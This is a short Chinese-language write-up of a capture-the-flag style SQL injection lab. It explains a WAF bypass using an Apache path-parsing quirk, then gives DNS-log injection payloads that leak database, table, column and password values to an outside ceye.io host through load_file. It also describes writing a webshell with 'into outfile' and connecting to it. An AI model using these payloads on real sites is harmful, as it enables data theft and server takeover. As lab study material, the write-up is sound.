知识点:
1.dns-log注入,是用sql语句的load_file()函数[读取文件]来进行的,在高版本的mysql是默认禁用这个函数的,所以要在mysql.ini加入secure_file_priv=来解除限制。
2.同一局域网通过UNC路径进行文件访问,利用的是smb【文件共享服务】,其支持域名和ip。
3.apache解析特性:1.php/1.txt会认为1.php是文件夹,1.txt是文件内容,但是因为找不到这个文件夹,所以会把这一坨当做1.php来解决【绕waf】
4.into outfile函数,into dumpfile函数
首先看靶场
当我传参?id=1 and 1=1 时,会被拦截
尝试绕过:
1:?id=1 and 1 like 1[失败]
2:?id=1 and -1=-1[成功] 存在注入点
3:利用apache解析特性 xx.php/1.txt?id=1 and 1=1 [成功]
这里获得数据有两种方法
1.dns-log注入
2.上传一句话木马获得shell
1. dns-log注入
我使用的dns-log平台为:ceye.io
payload:?id=1 and load_file(concat("//",database(),".uki4y9.ceye.io/abc"))
查看dns-log,得到库名
然后用相同的方法来获得表名和字段名
payload:xx.php/1.txt?id=1 and load_file(concat("//",(select table_name from information_schema.tables where table_schema=database() limit 0,1),".uki4y9.ceye.io/abc"))
得到第一个表:
同理可得其他的表,因为题目里提示flag在admin表里,所以不再继续注入
然后来获得字段名
payload:xx.php/1.txt?id=1 and load_file(concat("//",(select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1),".uki4y9.ceye.io/abc"))
得到第一个字段:
同理得到其他字段:
爆了三个就不爆了
然后直接查询就行了
盲猜在password表里
payload:xx.php/1.txt?id=1 and load_file(concat("//",(select password from admin limit 0,1),".uki4y9.ceye.io/abc"))
得到flag:
2.上传一句话木马获得shell
利用的是into outfile或者into dumpfile函数来进行上传一句话木马
into outfile会把查询的东西导出到一个文件中
本地看看效果:
先在mysql.ini加入
然后
在D盘根目录可以看到
然后利用这个语句来进行shell上传
但因为是用联合查询,所以要先判断字段数,最后判断出有2个字段(用order by)
然后进行注入
注意!!!:但是这里有个非常硬性的条件,就是你在写入的时候,你要知道文件保存的路径,且通过网站能够访问到
因为某某原因,我知道这个靶场的网站路径,所以
payload:xx.php/1.txt?id=1 union select '',1 into outfile 'C:/phpStudy/www/2.php'
可以得到,文件上传成功
然后利用解析特性,得到shell,然后利用蚁剑或者菜刀连接就行
然后得到flag,但是,你也要知道数据库的密码,因为这里是弱密码,所以我能够直接连接
